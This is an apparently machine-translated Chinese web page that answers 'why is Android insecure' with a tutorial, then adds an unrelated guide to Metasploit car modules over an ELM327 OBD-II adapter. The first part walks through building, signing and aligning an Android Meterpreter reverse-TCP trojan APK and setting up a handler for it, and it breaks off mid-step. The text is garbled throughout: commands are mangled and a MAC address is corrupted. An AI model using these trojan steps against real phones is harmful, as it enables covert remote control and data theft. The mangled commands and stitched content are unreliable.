kali linux怎么啟動(dòng)metasploit 為什么有人說(shuō)安卓系統(tǒng)不安全?
為什么有人說(shuō)安卓系統(tǒng)不安全?謝謝邀請(qǐng)~ ~眾所周知,手機(jī)操作系統(tǒng)的兩大巨頭:安卓和蘋(píng)果。由于Android是開(kāi)源系統(tǒng),流暢度和安全性成為用戶經(jīng)常吐槽的話題,流暢度可以從使用中得到驗(yàn)證。那么為什么安全性
為什么有人說(shuō)安卓系統(tǒng)不安全?
謝謝邀請(qǐng)~ ~
眾所周知,手機(jī)操作系統(tǒng)的兩大巨頭:安卓和蘋(píng)果。由于Android是開(kāi)源系統(tǒng),流暢度和安全性成為用戶經(jīng)常吐槽的話題,流暢度可以從使用中得到驗(yàn)證。那么為什么安全性比蘋(píng)果 s系統(tǒng)?我們?cè)趺粗溃楷F(xiàn)在邊肖將帶你驗(yàn)證安卓手機(jī)的安全性。
和往常一樣,仍然需要使用kali系統(tǒng)下集成的metasploit工具生成木馬。1.打開(kāi)kali,輸入命令【MSF venom-p Android/meter preter/reverse _ TCP lhost "IP "lport "卡利系統(tǒng)的港口可以自由設(shè)置,但不 不要將其設(shè)置為固定端口號(hào)aaa.apk "。安卓手機(jī)的安卓包都是以apk結(jié)尾的,所以應(yīng)該會(huì)生成以apk結(jié)尾的文件。
如果出現(xiàn)如下所示的信息,說(shuō)明木馬文件已經(jīng)生成,可以從根目錄找到aaa.apk文件。
然后,您需要?jiǎng)?chuàng)建特洛伊木馬文件的證書(shū)和數(shù)字簽名。因?yàn)檫呅](méi)有學(xué)過(guò)Android開(kāi)發(fā),我只是知道安裝Android軟件需要這兩樣?xùn)|西,所以我可以 不要向題主和讀者解釋它們。請(qǐng)?jiān)徫摇?/p>
2.通過(guò)命令【keytool-genkey-v-keystore-alias AAA-keyalg RSA-keysize 1024-validity 999】創(chuàng)建一個(gè)證書(shū)。
然后配置相關(guān)信息,確認(rèn)證書(shū)信息。
3.【Jarsigner-verbose-sigalgsha 1 with RSA-digestalgsha 1-keystore AAAA . apk AAA】,創(chuàng)建數(shù)字簽名。
為了保證木馬可以在大部分安卓手機(jī)上安裝運(yùn)行,需要對(duì)木馬文件進(jìn)行優(yōu)化。4.首先安裝zipalign工具,安裝命令是【apt-get install zipalign】。
然后就可以優(yōu)化木馬文件了。命令是[zipalign -v 4 aaa.apk aaaa.apk],如果出現(xiàn)錯(cuò)誤消息,可以忽略。
5、打開(kāi)安卓虛擬機(jī),邊肖用把木馬文件傳到虛擬機(jī),暫時(shí)沒(méi)有安裝。
6.用【使用exploit/multi/handler】加載攻擊模塊,用【設(shè)置有效載荷Android/米Preter/Reverse _ TCP】選擇有效載荷模塊。
然后在Android虛擬機(jī)中安裝木馬文件并運(yùn)行。
7.返回kali系統(tǒng),執(zhí)行攻擊命令【
如何使用Metasploit進(jìn)行汽車(chē)安全性測(cè)試?
步驟1:獲得OBD II連接器硬件。
首先,我們有一個(gè)可以連接到汽車(chē)ODC II連接器的設(shè)備。這里我選擇相對(duì)便宜的ODB II ELM327藍(lán)牙迷你接口。亞馬遜上的價(jià)格是8.49美元,它可以有效地與汽車(chē)的CAN網(wǎng)絡(luò)進(jìn)行通信,并使用M: "。
第二步:安裝串口。
CAN協(xié)議是串行協(xié)議,所以我們需要安裝rubygem "串行端口 "。
kali gem安裝串行端口
步驟3:連接藍(lán)牙適配器
接下來(lái),我們需要連接我們的藍(lán)牙適配器,以便與我們汽車(chē)中的ELM 327適配器進(jìn)行通信。
要連接到ELM 327設(shè)備,我們需要獲取它的MAC地址。我們可以通過(guò)使用內(nèi)置的HCTooltool掃描藍(lán)牙設(shè)備來(lái)獲取MAC地址。
堿性酒精掃描
根據(jù)掃描結(jié)果,我這里的MAC地址是00 : 19 : 6 de CHO 5-@ . com 36 : 4 a: 9d。
現(xiàn)在,我們使用這個(gè)MAC地址發(fā)送我們的藍(lán)色牙科適配器連接到ELM 327設(shè)備。注意:請(qǐng)將MAC地址用雙引號(hào)括起來(lái),如下所示。
kali rfcomm connect/dev/rfcomm 1 00 : 19 : 6 d: 36 : 4 a: 9d
步驟4:運(yùn)行ELM 327中繼
下一步是運(yùn)行ELM 327中繼,以便Metasploit可以與ELM 327芯片組通信。您可以在/usr/share/metasploit-framework/tools/hardware目錄中找到它。
kali CD/usr/share/metasploit-framework/tools/hardware kali ls-l
在運(yùn)行它之前,讓 讓我們看看它的幫助信息。
kali ruby elm327_relay.rb -h
可以看到,我們只需要設(shè)置兩個(gè)參數(shù);速度(默認(rèn)為115200)和串行設(shè)備(默認(rèn)為/dev/ttyub0)。這里的串行設(shè)備可以通過(guò)dmesg | greptys *命令來(lái)確定。
現(xiàn)在,使用串行設(shè)備運(yùn)行elm327繼電器,并將速度保持在默認(rèn)值,如下所示。
kali ruby elm 327 _ relay . r b-s/dev/ttys 0第五步:啟動(dòng)Metasploit。
現(xiàn)在我們已經(jīng)配置了Kali Linux來(lái)與ELM 327設(shè)備通信,我們需要?jiǎng)?chuàng)建一個(gè)到Metasploit的硬件橋。Metasploit是為T(mén)CP/IP通信而構(gòu)建的,現(xiàn)在我們需要它通過(guò)串口與汽車(chē)的原生CAN協(xié)議進(jìn)行通信。
首先,我們啟動(dòng)Metasploit。
卡利msfconsole
然后,搜索汽車(chē)模塊。
卡利搜索汽車(chē)
如你所見(jiàn),汽車(chē)模塊很少,功能也很有限。
我們選擇使用輔助/客戶端/hwbridge/connect模塊。
msf使用輔助/客戶端/hwbridge/connect
加載模塊后,我們可以輸入info命令來(lái)獲取關(guān)于模塊的詳細(xì)信息。
卡利信息
最后,讓 讓我們執(zhí)行這個(gè)模塊。
Msf利用步驟6:使用Metasploit汽車(chē)模塊。
現(xiàn)在,我們已經(jīng)在車(chē)輛中創(chuàng)建了Metasploit和C。協(xié)議之間的硬件橋。所以我們可以開(kāi)始使用Metasploit中的car模塊。
例如,您想要檢索車(chē)輛信息。
msf使用post/硬件/汽車(chē)/getvinfo
該模塊將查詢并收集所有車(chē)輛故障診斷碼(DTC)和其他信息,如速度、冷卻液溫度、車(chē)輛識(shí)別號(hào)(VIN ),甚至清除DTC。
現(xiàn)在,我們可以將我們的Linux系統(tǒng)和Metasploit框架直接連接到車(chē)載網(wǎng)絡(luò),直接與車(chē)載設(shè)備進(jìn)行通信!